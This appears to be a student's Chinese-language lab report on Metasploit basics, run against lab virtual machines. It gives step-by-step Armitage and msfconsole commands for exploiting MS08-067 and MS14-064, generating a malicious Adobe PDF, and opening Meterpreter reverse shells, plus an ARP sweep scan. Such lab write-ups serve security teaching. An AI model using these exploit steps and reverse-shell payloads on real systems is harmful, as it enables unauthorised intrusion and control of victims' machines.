Exp5 MSF基础应用

• 一、基础问题

• 二、攻击实例

  • 主动攻击

    • ms08_067_netapi(成功)

    • ms10_061_spoolss(失败)

  • 针对浏览器的攻击

    • ms14_064_ole_code_execution(成功)

    • ms16_051_vbscript(失败)

  • 攻击客户端的实践

    • adobe_toolbutton(成功)

    • ms10_087_rtf_pfragments_bof(失败)

    • CVE-2017-11882(失败)

    • office_word_hta(失败)

    • adobe_flashplayer_button(失败)

    • adobe_reader_u3d(失败)

  • 成功应用任何一个辅助模块

    • discovery/arp_sweep(唯一)

（失败的攻击之后会慢慢补充进来...）

• 三、实验中遇到的问题及解决方案

• 四、实验总结

用自己的话解释什么是exploit,payload,encode

• exploit是渗透攻击，说白了就是：攻击者利用系统、应用或服务中的安全漏洞去进行攻击。

• payload直译过来叫载荷，是目标系统在被渗透攻击之后去执行的代码。例如，之前做过的几个实验都利用反弹式shell来在攻击主机与受害主机之间创建连接。

• encode是对payload中的代码进行变形，以达到免杀目的的编码。

返回目录

二、攻击实例

实验点一：主动攻击

靶机：Windows XP SP2 (English)

• 首先在kali终端上输入/etc/init.d/postgresql start，启动postgresql服务。

• 输入armitage启动Armitage。

• 根据已知信息推导出目标主机所在网段的IP，扫描目标网段完整信息，确认目标网络拓扑结构以实施网络侦查。依次选择Hosts->Nmap Scan->Quick Scan(OS detect)。

• 填写靶机所在网段172.20.10.0/24。

• 扫描得出所有该网段的虚拟机。

• 选中靶机172.20.10.2，右键选择Services，查看靶机上开启的服务。

• 选中靶机172.20.10.2，右键选择Scan，Armitage会调用Metasploit的漏洞扫描模块，定向扫描靶机，寻找存在的漏洞，为下一步确定攻击方法提供参考依据。

• 利用上一步中漏洞扫描得到的漏洞信息，自动搜索Metasploit攻击模块库，寻找合适的攻击模块。选中靶机172.20.10.2，依次选择菜单栏Attacks->Find Attacks，Armitage会开始自动搜索寻找合适的攻击模块。

• 搜索完成。

• 在利用Armitage完成对靶机的攻击模块自动化搜索以后，选中172.20.10.2主机右键可以发现多了Attack菜单。依次选择Attack->smb->ms08_067_netapi菜单，选择smb漏洞下的ms08_067漏洞对XP靶机进行攻击(也可以在Armitage左侧树型目录下依次选择exploit->windows->smb->ms08_067_netapi找到该漏洞)。

• 在弹出的攻击配置对话框中配置LHOST/RHOST、LPORT/RPORT等信息，Targets处配置靶机的系统（一般默认自动检测靶机系统），勾选Use a reverse connection，点击Launch开始攻击。

• Armitage会进行一系列自动化攻击！攻击完成后，会看到靶机被红色闪电围绕，证明攻击成功。

• Armitage会自动建立一个驻留在内存的shellcode即Meterpreter。在攻击成功的靶机上右键选择Meterpreter 1->Interact->Command Shell，输入dir命令查看靶机C:\WINDOWS\system32目录下的系统文件。

• 在攻击成功的靶机上右键选择Meterpreter 1->Interact->Meterpreter Shell，输入getuid命令查看靶机当前用户的权限是SYSTEM权限。

返回目录

靶机：Windows 7

• 还是依次选择Attack->smb->ms10_061_spoolss菜单

• 在弹出的攻击配置对话框中配置

• 结果是会话未建立，攻击不成功...

返回目录

实验点二：针对浏览器的攻击

靶机：Windows XP SP2 (English)

• 使用漏洞use windows/browser/ms14_064_ole_code_execution

• 选择攻击载荷set payload windows/meterpreter/reverse_tcp

• 设置攻击机ipset LHOST 172.20.10.13

• 设置攻击端口set LPORT 5233

• 设置url域名set URIPATH zyx5233

• 开始攻击exploit

• 在浏览器输入http://172.20.10.13:8080/zyx5233

• 建立会话sessions -i 1,即可通过shell来进行一系列信息的查看。

返回目录

实验点三：一个针对客户端的攻击

靶机：Windows XP SP2 (English)

• 使用漏洞use windows/fileformat/adobe_toolbutton

• 选择攻击载荷set payload windows/meterpreter/reverse_tcp

• 设置攻击机ipset LHOST 172.20.10.13

• 设置攻击端口set LPORT 5233

• 开始攻击exploit，此时/root/.msf4/local/目录下成功生成了一个20165233.pdf文件，将其拖至Windows XP虚拟机内。

.msf4文件夹怎么办？如图所示

• 使用监听模块use exploit/multi/handler开始监听，此时在Windows XP虚拟机上，用Adobe打开20165233.pdf文件，可看到攻击并回连成功。

返回目录

实验点四：成功应用任何一个辅助模块

通过此模块可扫描局域网的一个网段内有多少主机存活。

• 使用discovery/arp_sweep模块use/auxiliary/scanner/discovery/arp_sweep

• 查看选项show options

• 目标网段set RHOSTS 10.180.100.0/24

• 线程set THREADS 50

• 开始exploit，扫描结果如下：

返回目录

• 实验中遇到的问题多半都是无法攻击成功，所以办法只有不断的更换靶机以及各种渗透的方式，这个过程真的漫长又痛苦...

返回目录

• 此次实验真的太艰辛了，在主动攻击那里，刚开始就更换了xp、2008、2003、win7各种靶机，也尝试了ms08、ms10两种exploits模块，最终使用了xp的英文版才攻击成功，第一个实验点就做了4天...真实的哭泣了。对浏览器的攻击充满了玄学，明明无会话建立（no session was created），但是竟然在无数次失败之后突然攻击成功了，IE的页面也不再是黄色的警示标志，而是done，整个过程也经历了2天。在对客户端攻击那里是最崩溃的，对应找exploits，然后show options，再info找到合适的靶机和攻击对象的正确版本，哇...真的太不容易了，起初尝试攻击0ffice2003，竟然打开msf.doc不是蹦出计算器，而是直接给我把文档打开了。。。见下图：
  

• 此后尝试6个exploits的过程就不一一描述了。总之慢慢感受到渗透攻击的难度了，并不是像之前的实验那么轻而易举。实际的系统经常会打补丁，还有漏洞报告，所以真的不是那么好攻击的。

返回目录